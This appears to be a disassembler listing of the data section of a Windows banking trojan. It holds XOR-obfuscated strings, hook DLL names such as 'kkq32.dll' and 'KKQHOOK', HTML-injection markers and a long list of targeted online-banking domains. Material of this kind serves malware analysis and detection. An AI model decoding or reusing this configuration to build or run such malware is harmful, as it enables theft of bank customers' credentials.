dword_4469C8 dd 714768h ; DATA XREF: sub_408FEB+6DD�r
dword_4469CC dd 677180h ; DATA XREF: sub_408FEB+77F�r
aBNB db '*N;',0 ; DATA XREF: sub_408FEB+884�o
word_4469D6 dw 41h ; DATA XREF: sub_408FEB+9A8�r
byte_4469D8 db 66h, 37h, 0 ; DATA XREF: sub_408FEB+A06�o
word_4469DB dw 42h ; DATA XREF: sub_409A96+15�r
word_4469DD dw 20h ; DATA XREF: sub_409A96+22�r
byte_4469DF db 0 ; DATA XREF: sub_409A96+35�o
dword_4469E0 dd 4B7F4335h ; DATA XREF: sub_409A96+46�o
db 75h, 0
dword_4469E6 dd 5A647Ah ; DATA XREF: sub_409A96+60�r
word_4469EA dw 6Bh ; DATA XREF: sub_409A96:loc_409B01�r
aJsvquX db 'jsvQu&x',0 ; DATA XREF: sub_409A96+C0�o
byte_4469F4 db 0 ; DATA XREF: sub_409A96+F4�o
aWgV db 'Wg/v',0 ; DATA XREF: sub_409A96+1F4�o
aVH db '-V,H',0 ; DATA XREF: sub_409A96+207�o
aPPd db 'P Pd',0 ; DATA XREF: sub_409A96+3F0�o
dword_446A04 dd 3E3951h ; DATA XREF: sub_409A96+4C2�r
word_446A08 dw 34h ; DATA XREF: sub_409A96+53C�r
word_446A0A dw 4220h ; DATA XREF: sub_409A96+5F4�o
db 0
byte_446A0D db 58h, 60h, 0 ; DATA XREF: sub_409A96+6E5�o
aNS6r db 'N s6r<`',0 ; DATA XREF: sub_409A96+742�o
aWxRcnn db 'WX!rcNN',0 ; DATA XREF: sub_409A96+7D0�o
aFldF db 'FLd^F',0 ; DATA XREF: sub_409A96+7EF�o
byte_446A26 db 0 ; DATA XREF: sub_409A96+899�o
aAgwb db 'AGwB',0 ; DATA XREF: sub_409A96+93A�o
aMmv9nnh db 'MM9NNH',0 ; DATA XREF: sub_409A96+9C3�o
aYZh db 'y+Zh',0 ; DATA XREF: sub_409A96+9E0�o
dword_446A39 dd 5F782Eh ; DATA XREF: sub_409A96+AA3�r
aYq2y db 'yq:2y',0 ; DATA XREF: sub_409A96+B19�o
word_446A43 dw 2Fh ; DATA XREF: sub_409A96+BA1�r
aTAsj db 't ASJ,%',0 ; DATA XREF: sub_409A96+BF7�o
aOat? db '|oat*?',0 ; DATA XREF: sub_409A96+C0A�o
a36 db '/36,',0 ; DATA XREF: sub_409A96+F80�o
aYeJ db 'yE J',0 ; DATA XREF: sub_409A96+FDB�o
a2F db '2! f <',0 ; DATA XREF: sub_40AB84+12�o
dword_446A65 dd 3F2743h ; DATA XREF: sub_40AB84+29�r
a@63M db '@63!m/#',0 ; DATA XREF: sub_40AB84+109�o
a@7sHkf db '@7s hKf',0 ; DATA XREF: sub_40AB84+16F�o
a2A db '2=$-a',0 ; DATA XREF: sub_40AB84+1EB�o
dword_446A7F dd 407475h ; DATA XREF: sub_40AB84:loc_40AD7D�r
aNpy4 db ' NPy4/#',0 ; DATA XREF: sub_40AB84+20A�o
byte_446A8B db 0 ; DATA XREF: sub_40AB84+288�o
a8s db '%8s ',0 ; DATA XREF: sub_40AB84+2A9�o
aAlnb db '<alNB',0 ; DATA XREF: sub_40AB84+5D0�o
aE db ' E',0 ; DATA XREF: sub_40AB84+630�o
aGxVY db 'X= <Y',0 ; DATA XREF: sub_40AB84+653�o
aLke4me db ' lkE4me',0 ; DATA XREF: sub_40AB84+6FC�o
word_446AAA dw 20h ; DATA XREF: sub_40B3C6:loc_40B3FA�r
aEHzR db 'E|hz!R',0 ; DATA XREF: sub_40B3C6+86�o
aPeck db ' PEck',0 ; DATA XREF: sub_40B3C6+D5�o
aQ_0 db '-Q',0 ; DATA XREF: sub_40B3C6+10B�o
aFr0Im db 'fR0~Im',0 ; DATA XREF: sub_40B525+7D�o
aQXsq db '/ q#xsq',0 ; DATA XREF: sub_40B525+F0�o
byte_446ACB db 0 ; DATA XREF: sub_40B525+33B�o
word_446ACC dw 83h ; DATA XREF: sub_40B525+367�r
off_446ACE dd offset loc_4059FB+5 ; DATA XREF: sub_40B525+391�o
; sub_40B525+3CB�o
dword_446AD2 dd 67762Eh ; DATA XREF: sub_40B525+422�r
dword_446AD6 dd 37784Ch ; DATA XREF: sub_40B525+444�r
aYrJ4? db 'yR j4?',0 ; DATA XREF: sub_40B525+4A3�o
byte_446AE1 db 0 ; DATA XREF: sub_40B525+523�o
a_Wqj db '. wQj',0 ; DATA XREF: sub_40B525+5B3�o
aE?qK db 'e* ?Q k',0 ; DATA XREF: sub_40B525+638�o
word_446AF0 dw 5Fh ; DATA XREF: sub_40B525+8B4�r
align 4
byte_446AF4 db 0B7h, 0 ; DATA XREF: sub_40B525+886�o
word_446AF6 dw 0BDBAh ; DATA XREF: sub_40B525+79C�o
db 0
aTCC db 'җؗ',0 ; DATA XREF: sub_40B525+6B0�o
byte_446B0D db 0E2h, 0D9h, 0D6h ; DATA XREF: sub_40B525+69E�o
dd 97D2DBD5h, 0D697D8C3h, 0D8DFC3C2h, 0D2CDDEC5h, 0FE979A97h
dd 0E5F8F4F9h, 0E3F4F2E5h, 0F9FEE797h, 0DBE79799h, 0D2C4D6D2h
dd 0D8D4979Bh, 0D4D2C5C5h
db 0C3h, 99h, 0
aTT db 'Ě',0 ; DATA XREF: sub_40B525+4B7�o
byte_446B49 db 0E7h, 0DBh, 0D2h ; DATA XREF: sub_40B525+45F�o
dd 9BD2C4D6h, 0DBD2C497h, 97C3D4D2h, 0DEC7CFF2h, 0DEC3D6C5h
dd 0EE97D9D8h, 0C5D6D2h
aTCt db 'ė',0 ; DATA XREF: sub_40B525+3FA�o
; sub_40B525+6FF�o
word_446B6E dw 0DBE7h ; DATA XREF: sub_40B525+3AC�o
dd 0D2C4D6D2h, 0D2C4979Bh, 0C3D4D2DBh, 0C7CFF297h, 0C3D6C5DEh
dd 97D9D8DEh, 0C3D9D8FAh
db 0DFh, 0
word_446B8E dw 0C492h ; DATA XREF: sub_40B525+348�o
db 0
byte_446B91 db 0F4h, 0FBh, 0E4h ; DATA XREF: sub_40AB84+70B�o
dd 92EBF3FEh, 0D9FEEBC4h, 0D4D8C5E7h, 0C1C5D2E4h, 8584C5D2h
db 0
byte_446BA9 db 0E1h, 0 ; DATA XREF: sub_40AB84+6DA�o
byte_446BAB db 0FCh ; DATA XREF: sub_40AB84+6C1�o
db 0
byte_446BAD db 0E4h, 0D8h, 0D1h ; DATA XREF: sub_40AB84+689�o
dd 0C5D6C0C3h, 0DEFAEBD2h, 0C4D8C5D4h, 0EBC3D1D8h, 0D3D9DEE0h
dd 0EBC4C0D8h, 0C5C5C2F4h, 0E1C3D9D2h, 0DEC4C5D2h, 0E4EBD9D8h
dd 0DBDBD2DFh, 0C1C5D2E4h, 0F8D2D4DEh, 0D4D2DDD5h, 0DBD2F3C3h
dd 0D8FBCED6h
db 0D6h, 0D3h, 0
aXFC db '',0 ; DATA XREF: sub_40AB84+584�o
aDes db 'ۄ',0 ; DATA XREF: sub_40AB84+570�o
aIS_1 db 'Ù',0 ; DATA XREF: sub_40AB84+434�o
aTIS_1 db '',0 ; DATA XREF: sub_40AB84+3F3�o
aDatkkq32_dll db 'datkkq32.dll',0 ; DATA XREF: sub_40AB84+3CE�o
aDnkkq_dll db 'dnkkq.dll',0 ; DATA XREF: sub_40AB84+39B�o
aKkq32_dll db 'kkq32.dll',0 ; DATA XREF: sub_40AB84+36C�o
aTIt db '',0 ; DATA XREF: sub_40AB84+362�o
; sub_40AB84+391�o ...
aTItS_1 db 'ę',0 ; DATA XREF: sub_40AB84+2C5�o
asc_446C61 db '',0 ; DATA XREF: sub_40AB84+C6�o
aIIS db 'ә',0 ; DATA XREF: sub_40AB84+4C�o
align 10h
dd 0
dbl_446C84 dq 1.2 ; DATA XREF: sub_409A96+F8D�r
aLCKNsstIlsI db 'җԊǍĉ҉',0 ; DATA XREF: sub_409A96+E51�o
aLI db 'ۉ',0 ; DATA XREF: sub_409A96+D9E�o
aC_1 db 'ė',0 ; DATA XREF: sub_409A96+D2D�o
asc_446CB9 db '',0 ; DATA XREF: sub_409A96+CEC�o
aE_0 db 'Ӆ',0 ; DATA XREF: sub_409A96+C89�o
aC_0 db 'ӗ',0 ; DATA XREF: sub_409A96+BC3�o
word_446CCA dw 0C492h ; DATA XREF: sub_409A96+B76�o
dd 97F49897h
db 92h, 0C4h, 0
aIS_0 db 'ә',0 ; DATA XREF: sub_409A96+B4E�o
aTIS_0 db 'ә',0 ; DATA XREF: sub_409A96+B29�o
aIS db 'ә',0 ; DATA XREF: sub_409A96+AE1�o
aTIS db 'ә',0 ; DATA XREF: sub_409A96+AC1�o
aNtze db '',0 ; DATA XREF: sub_409A96+A3D�o
aIKe db 'NJ',0 ; DATA XREF: sub_409A96+8D4�o
aTItS_0 db 'ę',0 ; DATA XREF: sub_409A96+74C�o
aC db '×',0 ; DATA XREF: sub_409A96+473�o
asc_446D20 db '',0 ; DATA XREF: sub_409A96+25C�o
; sub_409A96+5B3�o ...
aIKt db 'Ԋ',0 ; DATA XREF: sub_409A96+216�o
asc_446D2A db '',0 ; DATA XREF: sub_409A96+1BD�o
; sub_409A96+2E5�o
word_446D2E dw 0D8E4h ; DATA XREF: sub_409A96+1AB�o
; sub_409A96+2D3�o
dd 0D6C0C3D1h, 0FAEBD2C5h, 0D8C5D4DEh, 0C3D1D8C4h, 0D9DEE0EBh
dd 0C4C0D8D3h
db 0
aSS db 'ę',0 ; DATA XREF: sub_409A96+16A�o
aS db '',0 ; DATA XREF: sub_409A96+135�o
aNsst db 'Ǎ',0 ; DATA XREF: sub_409A96+101�o
aTItS db 'ę',0 ; DATA XREF: sub_409A96+97�o
; sub_409A96+583�o ...
byte_446D69 db 0F4h, 0DBh, 0DEh ; DATA XREF: sub_408FEB+81A�o
dd 0F897DCD4h, 97D2D4D9h, 0F497D8E3h, 0DEC3D9D8h, 0D2C2D9h
dword_446D80 dd 0E3E3E2F5h ; DATA XREF: sub_408FEB+808�o
db 0F8h, 0F9h, 0
byte_446D87 db 0F2h ; DATA XREF: sub_408FEB+732�o
; sub_408FEB+78C�o
dd 0E3FEF3h
aCCCCCCS db 'җҗėӗΗٙ',0 ; DATA XREF: sub_408FEB+67C�o
byte_446DB3 db 0E2h ; DATA XREF: sub_408FEB+602�o
dd 0DBD5D6D9h, 0D8C397D2h, 0C3C2D697h, 0DEC5D8DFh, 9799D2CDh
dd 97FAE3F6h, 9AF9FEE7h, 0D2D3D8F4h, 97C4DE97h, 0C2C6D2C5h
dd 0D3D2C5DEh, 97D8C397h, 0C7DAD8D4h, 0D2C3D2DBh, 0D2DFC397h
dd 0D6C5C397h, 0D4D6C4D9h, 0D9D8DEC3h
db 99h, 0
word_446DFE dw 0E3F6h ; DATA XREF: sub_408FEB+573�o
dd 0FEE797FAh, 0D8F49AF9h
db 0D3h, 0D2h, 0
byte_446E0B db 0F2h ; DATA XREF: sub_408FEB+4E1�o
aC_2 db 'ٗ',0
aUCC db 'ŗӗ',0 ; DATA XREF: sub_408FEB+45B�o
aEztse db '',0 ; DATA XREF: sub_408FEB+3D9�o
aTse db '',0 ; DATA XREF: sub_408FEB+384�o
dword_446E38 dd 0F5FAF8F4h, 0EFF8F5F8h ; DATA XREF: sub_408FEB+26B�o
; sub_408FEB+2CE�o
db 0
byte_446E41 db 0BDh, 2 dup(97h) ; DATA XREF: sub_408FEB+131�o
dd 0C3C2F697h, 0DEC5D8DFh, 0DEC3D6CDh, 0F197D9D8h, 0D2DBDED6h
db 0D3h, 99h, 0
byte_446E5B db 0E4h ; DATA XREF: sub_408FEB+11F�o
; sub_408FEB+190�o ...
dd 0FEE3F6E3h
db 0F4h, 0
aKkqhook db 'KKQHOOK',0 ; DATA XREF: sub_408FEB+F6�o
; sub_409A96+272�o ...
db 0
byte_446E6B db 0F2h ; DATA XREF: sub_408FEB+5A�o
; sub_40B525+CB�o
db '',0
dword_446E74 dd 0F8D4D8F3h, 0D4D2DDD5h ; DATA XREF: sub_408FEB+22�o
; sub_40B525+AD�o
db 0C3h, 0
word_446E7E dw 0DDC8h ; DATA XREF: sub_408C17+188�o
dd 0F8E4ECF1h, 0BAF1E6FBh, 0B4F1ECF1h
db 0
byte_446E8D db 0C4h, 0F5h, 0E0h ; DATA XREF: sub_408C17+FC�o
db 0FCh, 0
word_446E92 dw 0FBC7h ; DATA XREF: sub_408C17+E7�o
dd 0F5E3E0F2h, 0D9C8F1E6h, 0FBE6F7FDh, 0E0F2FBE7h, 0B4D1DDC8h
dd 0E1E0F1C7h, 0F1C7C8E4h, 0E4E1E0h
dword_446EB4 dd 0F9E0FCBAh ; DATA XREF: sub_408C17+79�o
db 0
aKdnMsmKAiiaKLj db 'njƪɚɊӵǚ',0 ; DATA XREF: sub_408585+F1�o
aKdnSap db '̚Ǚ',0 ; DATA XREF: sub_408585+BF�o
aVmizmeNee db 'Ǎ',0 ; DATA XREF: sub_408477+5F�o
aCs db '',0 ; DATA XREF: sub_408165+22F�o
byte_446EF3 db 0FAh ; DATA XREF: sub_406EA8+EA0�o
dd 0B3BBBBB3h, 0B5FAB1B8h, 0A6B5A3B0h
db 0B1h, 0
word_446F02 dw 0B3FAh ; DATA XREF: sub_406EA8+E73�o
dd 0B8B3BBBBh
db 0B1h, 0FAh, 0
byte_446F0B db 0F4h ; DATA XREF: sub_406EA8+DE8�o
db 0
byte_446F0D db 0EEh, 0 ; DATA XREF: sub_406EA8+D61�o
byte_446F0F db 0F4h ; DATA XREF: sub_406EA8+CE2�o
dd 0EE8CF1h
byte_446F14 db 0A8h, 0 ; DATA XREF: sub_406EA8+680�o
word_446F16 dw 92E8h ; DATA XREF: sub_406EA8+5C0�o
dd 91999586h, 0F98CF18Bh, 99869B92h, 0EA8CF18Bh
db 0F4h, 0
word_446F2A dw 99E8h ; DATA XREF: sub_406EA8+56C�o
dd 849A9D95h, 9B92F993h, 0F18B9986h, 0F4EA8Ch
aName: ; DATA XREF: sub_406EA8+39�o
unicode 0, <name>,0
align 4
aValue: ; DATA XREF: sub_406EA8+24�o
unicode 0, <value>,0
dword_446F54 dd 0C2D3D9FDh, 0D6DFC3DFh, 0DEF990C4h, 0DEC2D5C4h, 0F590C4D5h
; DATA XREF: sub_406B58+BD�o
dd 0DFDCC0C8h, 0C2D5C2h
a9ba05972F6a811: ; DATA XREF: sub_406A6B+43�o
unicode 0, <{9BA05972-F6A8-11CF-A442-00A0C90A8F39}>,0
aHtml db '<HTML><!--',0 ; DATA XREF: sub_4063C4+45C�o
; sub_4063C4+467�o ...
aXOkrecv11 db 'X-okRecv11',0 ; DATA XREF: sub_4063C4+3C3�o
aYuvbqU db 'YUVbq}u',0 ; DATA XREF: sub_4063C4+311�o
dword_446FDC dd 65356335h, 5D303D30h, 7F627379h, 64767F63h, 647E5930h
; DATA XREF: sub_4063C4+2C2�o
dd 757E6275h, 68553064h, 627F7C60h
db 75h, 62h, 0
byte_446FFF db 4Ch ; DATA XREF: sub_4063C4+1BA�o
dd 60687559h, 75627F7Ch, 7568753Eh
db 30h, 0
a@qdx db '@qdx',0 ; DATA XREF: sub_4063C4+A6�o
byte_447013 db 43h ; DATA XREF: sub_4063C4+94�o
dd 6764767Fh, 4C756271h, 6273795Dh, 767F637Fh, 55594C64h
dd 64754330h, 434C6065h, 60656475h
db 0
byte_447035 db 51h, 2 dup(60h) ; DATA XREF: sub_406073+326�o
dd 7E756655h, 434C6364h, 7D757873h, 514C6375h, 4C636060h
dd 7C606855h, 6275627Fh, 6473514Ch, 64716679h, 54777E79h
dd 7D65737Fh, 4C647E75h, 6265533Eh, 647E7562h
db 0
byte_447071 db 51h, 2 dup(60h) ; DATA XREF: sub_406073+301�o
dd 7E756655h, 434C6364h, 7D757873h, 514C6375h, 4C636060h
dd 7C606855h, 6275627Fh, 66715E4Ch, 64717779h, 4C777E79h
dd 6265533Eh, 647E7562h
db 0
byte_4470A5 db 57h, 7Ch, 7Fh ; DATA XREF: sub_406073+2CD�o
aRqEcub_vvYU db 'rq|Ecub_vv|y~u',0
byte_4470B7 db 43h ; DATA XREF: sub_406073+2BB�o
dd 6764767Fh, 4C756271h, 6273795Dh, 767F637Fh, 79474C64h
dd 677F747Eh, 65534C63h, 7E756262h, 62754664h, 7E7F7963h
dd 647E594Ch, 757E6275h, 75433064h, 7E796464h
db 77h, 63h, 0
byte_4470F3 db 79h ; DATA XREF: sub_406073+28F�o
dd 7C606875h, 3E75627Fh, 756875h
dword_447100 dd 434C6335h, 6764767Fh, 4C756271h, 6273795Dh, 767F637Fh
; DATA XREF: sub_406073+25A�o
dd 7E594C64h, 7E627564h, 55306475h, 7F7C6068h, 4C627562h
dd 7E79715Dh, 7175564Ch, 75626564h, 647E7F53h, 4C7C7F62h
dd 44515556h, 4F554245h, 51535F5Ch, 53515D5Ch, 555E5958h
dd 535F5C4Fh, 475F545Bh
db 5Eh, 0
word_44715A dw 7569h ; DATA XREF: sub_406073+1F3�o
db 63h, 0
word_44715E dw 6252h ; DATA XREF: sub_406073+1E1�o
dd 7563677Fh, 4067755Eh, 75737F62h
db 2 dup(63h), 0
byte_44716F db 3Eh ; DATA XREF: sub_406073+1CF�o
dd 51565554h, 4C445C45h, 44565F43h, 55425147h, 73795D4Ch
dd 7F637F62h, 474C6476h, 7F747E79h, 534C6367h, 75626265h
dd 7546647Eh, 7F796362h, 68554C7Eh, 627F7C60h, 524C6275h
dd 63677F62h, 67755E75h, 737F6240h, 636375h
dword_4471BC dd 44565F43h, 55425147h, 7C7F404Ch, 75797379h, 795D4C63h
; DATA XREF: sub_406073+109�o
dd 637F6273h, 4C64767Fh, 747E7947h, 4C63677Fh, 62626553h
dd 46647E75h, 79636275h, 594C7E7Fh, 6275647Eh, 3064757Eh
dd 64647543h, 63777E79h, 7E7F4A4Ch, 354C6375h
db 65h, 0
asc_44720A db '!& !',0 ; DATA XREF: sub_406073+95�o
; sub_406073+C3�o ...
byte_44720F db 43h ; DATA XREF: sub_406073+61�o
dd 4744565Fh, 4C554251h, 6273795Dh, 767F637Fh, 79474C64h
dd 677F747Eh, 65534C63h, 7E756262h, 62754664h, 7E7F7963h
dd 647E594Ch, 757E6275h, 75433064h, 7E796464h, 4A4C6377h
dd 63757E7Fh, 65354Ch
a?xd_ db ',?xd}|.',0 ; DATA XREF: sub_4056CB+8E0�o
dword_44725C dd 7F723F2Ch, 2E6974h ; DATA XREF: sub_4056CB+8C8�o
a?csbyD_ db ',?csby`d.',0 ; DATA XREF: sub_4056CB+8AB�o
word_44726E dw 7563h ; DATA XREF: sub_4056CB+835�o
dd 7D794464h, 64657F75h, 63353238h, 3C323938h, 2B396535h
db 0
byte_447285 db 6Dh, 0 ; DATA XREF: sub_4056CB+80D�o
byte_447287 db 74h ; DATA XREF: sub_4056CB+7BB�o
dd 7D65737Fh, 3E647E75h, 633E6335h, 797D7265h, 2B393864h
db 0
byte_44729D db 76h, 65h, 7Eh ; DATA XREF: sub_4056CB+77B�o
dd 7F796473h, 6335307Eh, 6B3938h
a5s5E db '5s5>"e',0 ; DATA XREF: sub_4056CB+719�o
aCsbyD_ db ',csby`d.',0 ; DATA XREF: sub_4056CB+6D4�o
dword_4472BC dd 7F763F2Ch, 2E7D62h ; DATA XREF: sub_4056CB+6BC�o
aYEd0diU2cerYd2 db ',y~`ed0di`u-2cer}yd20fq|eu-77.',0 ; DATA XREF: sub_4056CB+687�o
a5cl db '5cl',0 ; DATA XREF: sub_4056CB+54A�o
byte_4472E7 db 2Ch ; DATA XREF: sub_4056CB+495�o
; sub_4056CB+5CA�o
dd 65607E79h, 69643064h, 322D7560h, 64797475h, 71663032h
dd 2D75657Ch, 37633537h, 7D717E30h, 35372D75h, 37653563h
dd 62722C2Eh, 1A1D2Eh
dword_447318 dd 607E792Ch, 64306465h, 2D756069h, 79747532h, 66303264h
; DATA XREF: sub_4056CB+2E8�o
dd 75657C71h, 6535372Dh, 717E3037h, 372D757Dh, 2C2E3771h
dd 1D2E6272h
db 1Ah, 0
word_447346 dw 762Ch ; DATA XREF: sub_4056CB+2A5�o
dd 307D627Fh, 79647371h, 322D7E7Fh, 30326335h, 7864757Dh
dd 322D747Fh, 44435F40h, 717E3032h, 322D757Dh, 2E326335h
db 0
aV5E db 'v5>#e',0 ; DATA XREF: sub_4056CB+267�o
byte_447377 db 2Ch ; DATA XREF: sub_4056CB+231�o
dd 69747F72h
db 2Eh, 0
a?xuqt_ db ',?xuqt.',0 ; DATA XREF: sub_4056CB+213�o
aMicrosoftCorp db 'MicroSoft-Corp',0 ; DATA XREF: sub_4056CB+1E2�o
; sub_4063C4+2D2�o
aDydU_5c5e?dydU db ',dyd|u.5c5e,?dyd|u.',0 ; DATA XREF: sub_4056CB+1D2�o
aXuqt_ db ',xuqt.',0 ; DATA XREF: sub_4056CB+1B4�o
aXd_ db ',xd}|.',0 ; DATA XREF: sub_4056CB+183�o
aXd db '>xd}',0 ; DATA XREF: sub_4056CB+150�o
a5c5s5s db '5c5s5s',0 ; DATA XREF: sub_4055F7+6A�o
; sub_4056CB+3F9�o
asc_4473C3 db ':>:',0 ; DATA XREF: sub_405415+F3�o
asc_4473C7 db '/',0 ; DATA XREF: sub_405415+61�o
a3zc db ';3zc',0 ; DATA XREF: sub_405098+166�o
a3zc_0 db '3zc',0 ; DATA XREF: sub_405098+FC�o
aN3N3N3N3N3N3N db '&n3&$~n3&$~n3&$~n3&$~n3&$~n3&$~n',0 ; DATA XREF: sub_405098+92�o
aE3zc db 'E;3zc;',0 ; DATA XREF: sub_405098+4F�o
a9usxbsd db '*9usxbsd(',0 ; DATA XREF: sub_404DE3+1E4�o
aUsxbsd db '*usxbsd(',0 ; DATA XREF: sub_404DE3+1B7�o
a9pyxb db '*9pyxb(',0 ; DATA XREF: sub_404DE3+175�o
a9c db '*9c(',0 ; DATA XREF: sub_404DE3+13A�o
a9t db '*9t(',0 ; DATA XREF: sub_404DE3+112�o
byte_44741F db 2Ah ; DATA XREF: sub_404DE3+DC�o
dd 287F39h
dword_447424 dd 287F2Ah ; DATA XREF: sub_404DE3+9A�o
dword_447428 dd 28632Ah ; DATA XREF: sub_404DE3+6D�o
dword_44742C dd 28742Ah ; DATA XREF: sub_404DE3+32�o
aTd db '*td(',0 ; DATA XREF: sub_404DE3+A�o
a6 db ';;(6',0 ; DATA XREF: sub_404BA0+7D�o
a76 db '*7;;6',0 ; DATA XREF: sub_404A48+8B�o
byte_447440 db 1Bh, 1Ch, 0 ; DATA XREF: sub_404878+1A3�o
; sub_404DE3+211�o
byte_447443 db 39h ; DATA XREF: sub_404878+F5�o
dd 33753339h, 1B753375h
db 1Ch, 0
aWd63u3u3u663c db '`wd63u3u3u6+63c-',0 ; DATA XREF: sub_404878+12�o
a69 db '6<9',0 ; DATA XREF: sub_40479E+A8�o
a3e3u db '3e3u',0 ; DATA XREF: sub_40479E+30�o
; sub_404BA0-94�o ...
a96 db '9<6',0 ; DATA XREF: sub_40472A+60�o
aBlind_user db 'blind_user',0 ; DATA XREF: sub_4045BD+67�o
; sub_40466A+19�o
aCC db '紻״',0 ; DATA XREF: sub_4041FC+2E1�o
dword_447480 dd 0FBFBF8AEh, 0D49E99E4h, 0B4F8F1F0h, 0FAAAE7B1h, 9E99F8E1h
; DATA XREF: sub_4041FC+236�o
dd 0B4F2FDD4h, 0E7FDECF1h, 0E7B1B4E0h, 0E0FBF3B4h, 0FBF8B4FBh
dd 9E99E4FBh, 0F8F1F0D4h, 0AAE7B1B4h, 99F8E1FAh
db 9Eh, 0
word_4474BA dw 0F7C8h ; DATA XREF: sub_4041FC+1AF�o
dd 0F5F9F9FBh, 0F7BAF0FAh
db 0FBh, 0F9h, 0
byte_4474C7 db 0B1h ; DATA XREF: sub_4041FC+172�o
dd 0FBF7C8E7h, 0FAF5F9F9h, 0FDE4BAF0h
db 0F2h, 0
word_4474D6 dw 0E7B1h ; DATA XREF: sub_4041FC+140�o
dd 0F8E7ECC8h, 0ADF8F0F2h, 0F5F6BAECh
db 0E0h, 0
word_4474E6 dw 0F7C8h ; DATA XREF: sub_4041FC+104�o
dd 0F1BAF0F9h
db 0ECh, 0F1h, 0
byte_4474EF db 0B1h ; DATA XREF: sub_4041FC+E4�o
dd 0F9F7C8E7h, 0FDE4BAF0h
db 0F2h, 0
word_4474FA dw 0E7B1h ; DATA XREF: sub_4041FC+C4�o
dd 0F8E7ECC8h, 0FAF8F0F2h, 0F5F6BAE0h
db 0E0h, 0
word_44750A dw 1B27h ; DATA XREF: sub_404028+5B�o
dd 15030012h, 39281106h, 1B06171Dh, 121B07h, 1A1D2328h
dd 7031B10h, 6013728h, 1A1106h, 7061122h, 281A1B1Dh, 18111C27h
dd 6112718h, 11171D02h, 111E163Bh, 11300017h, 380D1518h
dd 10151Bh
dword_447550 dd 6150435h, 1A111900h ; DATA XREF: sub_404028+36�o
db 2 dup(0)
word_44755A dw 1C20h ; DATA XREF: sub_404028+24�o
dd 10151106h, 39131A1Dh, 1811101Bh
db 0
byte_447569 db 0 ; DATA XREF: sub_404028:loc_40402F�o
; sub_406073+30F�o ...
word_44756A dw 3837h ; DATA XREF: sub_403D2D+2DD�o
dd 28303D27h, 3D280751h, 1B06241Ah, 6112717h, 47061102h
db 46h, 0
word_447582 dw 751h ; DATA XREF: sub_403D2D+229�o
dd 5A075128h, 181810h
dword_44758C dd 4044510Fh, 4044512Ch, 4451592Ch, 51592C40h, 592C4044h
; DATA XREF: sub_403D2D+2B�o
dd 2C404451h, 40445159h, 2 dup(4044512Ch)
db 2Ch, 9, 0
byte_4475B3 db 54h ; DATA XREF: sub_403BBF+111�o
db 0
byte_4475B5 db 51h, 7, 28h ; DATA XREF: sub_403BBF+3E�o
dd 115A0751h
db 0Ch, 11h, 0
aQdl db 'QDL,',0 ; DATA XREF: sub_403AED+73�o
byte_4475C4 db 5, 0 ; DATA XREF: sub_4038DA+4A�o
; .text:004039AE�o
word_4475C6 dw 62h ; DATA XREF: sub_4037FA+1F�o
byte_4475C8 db 2, 0 ; DATA XREF: sub_4036F8+A7�o
word_4475CA dw 0C70h ; DATA XREF: sub_403530+33�o
; sub_4035A5+46�o
db 0
aChevychasebank db 'chevychasebank.com',0 ; DATA XREF: .data:0043C1DC�o
aGronxplanets_r db 'gronxplanets.ru',0 ; DATA XREF: .data:0043C1D8�o
aWww_mdmbank_ru db 'www.mdmbank.ru',0 ; DATA XREF: .data:0043C1D4�o
aFethard_biz db 'fethard.biz',0 ; DATA XREF: .data:0043C1D0�o
aRoyalbank_com db 'royalbank.com',0 ; DATA XREF: .data:0043C1CC�o
aSecuritylab_ru db 'securitylab.ru',0 ; DATA XREF: .data:0043C1C8�o
aTatNeftbank_ru db 'tat-neftbank.ru',0 ; DATA XREF: .data:0043C1C4�o
aSeclab_ru db 'seclab.ru',0 ; DATA XREF: .data:0043C1C0�o
aOpenbank_com db 'openbank.com',0 ; DATA XREF: .data:0043C1BC�o
aGutabank_ru db 'gutabank.ru',0 ; DATA XREF: .data:0043C1B8�o
aWww_b2bTrust_c db 'www.b2b-trust.com',0 ; DATA XREF: .data:0043C1B4�o
aGrepwareFacili db 'grepware-facility.ru',0 ; DATA XREF: .data:0043C1B0�o
aWww_uralsib_ru db 'www.uralsib.ru',0 ; DATA XREF: .data:0043C1AC�o
a53bank_com db '53bank.com',0 ; DATA XREF: .data:0043C1A8�o
aWww_nbc_caInde db 'www.nbc.ca/index.php',0 ; DATA XREF: .data:0043C1A4�o
aTotallyfreeban db 'totallyfreebanking.com',0 ; DATA XREF: .data:0043C1A0�o
aBarclays_com db 'barclays.com',0 ; DATA XREF: .data:0043C19C�o
aWww_lbcdirect_ db 'www.lbcdirect.laurentianbank.ca/index.php',0
; DATA XREF: .data:0043C198�o
aKidosBank_ru db 'kidos-bank.ru',0 ; DATA XREF: .data:0043C194�o
aYambo_biz db 'yambo.biz',0 ; DATA XREF: .data:0043C190�o
aProrat_net db 'prorat.net',0 ; DATA XREF: .data:0043C18C�o
aWww1_hsbc_caIn db 'www1.hsbc.ca/index.php',0 ; DATA XREF: .data:0043C188�o
aWww_ovk_ru db 'www.ovk.ru',0 ; DATA XREF: .data:0043C184�o
aWww_rbc_com db 'www.rbc.com',0 ; DATA XREF: .data:0043C180�o
aMasterX_comFor db 'master-x.com/forum/',0 ; DATA XREF: .data:0043C17C�o
aWww_allahabadb db 'www.allahabadbank.com',0 ; DATA XREF: .data:0043C178�o
aOnlineBusiness db 'online-business.lloydstsb.co.uk',0 ; DATA XREF: .data:0043C174�o
aMyonlineaccoun db 'myonlineaccounts2.abbeynational.co.uk',0 ; DATA XREF: .data:0043C170�o
aWww_absolutban db 'www.absolutbank.ru',0 ; DATA XREF: .data:0043C16C�o
aKavkazcenter_c db 'kavkazcenter.com/russ',0 ; DATA XREF: .data:0043C168�o
aWww_netmagiste db 'www.netmagister.com',0 ; DATA XREF: .data:0043C164�o
aWww_kmb_ru db 'www.kmb.ru',0 ; DATA XREF: .data:0043C160�o
aWww_spyinstruc db 'www.spyinstructors.com',0 ; DATA XREF: .data:0043C15C�o
aAcroleinHawk_r db 'acrolein-hawk.rubanking.halifax-online.co.uk',0
; DATA XREF: .data:0043C158�o
aWww_icbank_ru db 'www.icbank.ru',0 ; DATA XREF: .data:0043C154�o
aWww_bankofindi db 'www.bankofindia.com',0 ; DATA XREF: .data:0043C150�o
aPizdabolInc_ru db 'pizdabol-inc.ru',0 ; DATA XREF: .data:0043C14C�o
aWww_sbrf_ru db 'www.sbrf.ru',0 ; DATA XREF: .data:0043C148�o
aWww_candidatev db 'www.candidateverifier.com/index.php',0 ; DATA XREF: .data:0043C144�o
aWww_worldbank_ db 'www.worldbank.org/index.php',0 ; DATA XREF: .data:0043C140�o
